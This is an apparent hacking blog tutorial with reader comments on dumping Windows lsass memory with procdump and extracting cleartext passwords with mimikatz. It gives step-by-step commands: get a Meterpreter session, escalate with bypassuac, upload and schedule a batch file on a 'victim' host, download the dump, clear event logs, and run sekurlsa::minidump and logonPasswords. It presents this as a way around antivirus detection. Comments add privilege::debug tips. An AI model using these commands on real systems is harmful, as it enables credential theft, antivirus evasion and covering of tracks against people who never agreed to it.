Mimikatz is great tool to get cleat text password . it extract password from memory. If you want to use ; here is my previous tutorial . Also it include now in metasploit. But now most of Antivirus detect it. So now we use another method to get clear text password using mimikatz alpha.
(1)It`s post exploitation method ;so first you have to get meterpreter session using metasploit. If you are new ; then visit metasploit section of blog. You also need admin access of box. So for that you can use bypassuac module of metasploit.
(2)First download latest mimikatz which contain alpha version of it from following link.
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.7z
Then download process dump from following link
http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
(3)Now make one batch file name it to procdump.bat . paste following code into batch file.
@echo off
C:\windows\temp\procdump.exe -accepteula -ma lsass.exe C:\windows\temp\dump_file.dmp 2>&1
(4)Now from meterpreter session upload procdump.bat & downloaded procdump.exe file to C:\windows\temp folder.
(5)Now go to shell from meterpreter & if you are not in temp directory change it to the C:\windows\temp
Now here what we do is create scheduled task.So type following command in shell.
at \\192.168.1.3 20:55 C:\windows\temp\procdump.bat
So what this batch file do. It create process dump file using procdump.exe.
(6)Now download dump_file.dmp from temp folder ; then remove uploaded file from folder & clear ev.
We have process dump file ; so we can extract password from this file using minidump .But only one requirement is we should running mimikatz on same version & architecture from where we pull.
Go to folder alpha & then according to your victim o.s and put dump_file.dmp in that folder.
(8)Open mimikatz.exe from cmd which is in folder alpha/win32 & type following command.
sekurlsa::minidump dump_file.dmp
(9)It`s final step type this command in cmd.
sekurlsa::logonPasswords
Disadvantage of this process is size of dump file . In my case it`s 25 m.b ; but it depend on running process.
Now you have all credential of victim in clear text.If you face any difficulty you can mention in comment.
7 comments:
i tried the above but it keeps displaying ERROR
mimikatz # sekurlsa::logonPasswords full
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle of memory : 00000005
please help me ?
First i assume that you have enough privilege , and then one requirement is we should running mimikatz on same version & architecture from where we pull.View second image of post for compatible issue. @Ammar Hashim
I get the following error
sekurlsa::logonPasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Local LSA library failed
please help
i tried the above but it keeps displaying ERROR
mimikatz # sekurlsa::logonPasswords full
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle of memory : 00000005
how to get sysytem level priv from cmd?
Run in administrator
Then : privilege::debug
Then : sekurlsa::logonPasswords
Use "privilege::debug" before using your command.
is it possible to use such procdump script on windows? if so with which command?
Post a Comment